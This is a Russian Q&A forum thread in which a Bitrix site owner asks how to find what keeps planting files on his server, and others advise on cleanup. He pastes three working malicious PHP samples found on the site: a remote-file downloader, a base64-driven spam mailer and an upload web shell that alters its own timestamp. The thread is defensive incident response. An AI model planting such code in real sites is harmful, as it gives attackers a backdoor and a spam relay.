Как отследить вирус на сайте?

Question

[DYLAN]

Имеется сайт на Bitrix установленный на VDS'ку на днях обнаружил странный код в index.php, код представляет собой зашифрованный php и вмести с ним появляются различные файлы типа
hh.ru
mama332.php
wp-cron-sample.php
и т.д. содержимое файлов следующее

<?php
function class_x_i($x = ''){
$urlset = isset($_GET['name']) ? trim($_GET['name']) : '';
$filename = isset($_GET['file']) ? trim($_GET['file']) : '';
$ch = curl_init('http://'.$urlset);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
file_put_contents($filename,$result);
echo 'O1024K';
}
class_x_i();
?>

<?php
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
	{
	echo "indata_error";
	exit;
	}
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
	{
	echo "indata_error";
	exit;
	}
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
	{
	echo "indata_error";
	exit;
	}
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
	{
	echo "indata_error";
	exit;
	}
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
	echo "sent_ok";
else
	echo "sent_error";
?>

Как можно отследить источник, который инициирует создание этих файлов?

1. Можно логировать все запросы на сайт и при повторном обнаружении данных файлов, отследить возможную связь с некими запросами. Т.к. вирус может авторизоваться на сайте используя некий скрипт.

2. Проверил крон, ничего креминального не нашел, просто запуск cron_events.php в нем тоже все стандартно.

3. В агентах Битрикса тоже ничего не нашел, в момент появление этих файлов не выполнялся ни один агент

Comments

[Дмитрий]

Почитайте access.log

[DYLAN]

Дмитрий, да, по нему и вычислил половину файлов

Answer 1

[Антон Шаманов]

пароли поменять, софт обновить, админку перенести, онлайн проверка есть у каспера и веба

Comments

[DYLAN]

Пароли поменял у всех админов, которые заходили в период атаки, перенос админки дельный совет, надо будет провести

Answer 2

[Ярослав Александров]

Вам не источник искать сейчас нужно, а сделать профилактику:
1) Подключить на хостинге к услуге VDS антивирус, настроить ежедневную проверку, проверить файлы аккаунта.
2) Сменить все доступы: сайт, база, фтп (ssh), панель хостинга
3) Восстановить сайт из бекапа датой до взлома
4) Если нет бекапа тогда поставить модуль с маркетплейса "Поиск троянов" и прогнать сайт, если есть зараженные системные файлы перезалить ядро и модули битрикс

Answer 3

[DYLAN]

по логам отследил некий файл license.php через который загружались файлы

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
<title>utf</title>
</head>
<body>
<?php
print "<h1>#p@$c@#</h1>\n";
echo "Your IP: ";
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "</form>\n";
if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
	{
	move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
	$file = $_FILES/*;*/["filename"]["name"];
	echo "<a href=\"$file\">$file</a>";
	} else {
	echo("empty");
	}
$filename = $_SERVER[SCRIPT_FILENAME];
touch/*;*/($filename, $time);
?>
</body>
</html>

Однако дата создания у него не известна, соответственно нельзя точно понять, когда произошло заражение и через что =((

с помощью решения "Поиск троянов" из маркет плейса нашел ещё кучу файлов зашифрованным php кодом, заменил все пароли, будемс ждать

Comments

[Adamos]

Битрикс в общемировом вебе - продукт малоизвестный, так что уязвимость скорее не в нем, а в доступе тех, у кого он есть (особенно если кто-то до сих пор лезет на сайт по FTP).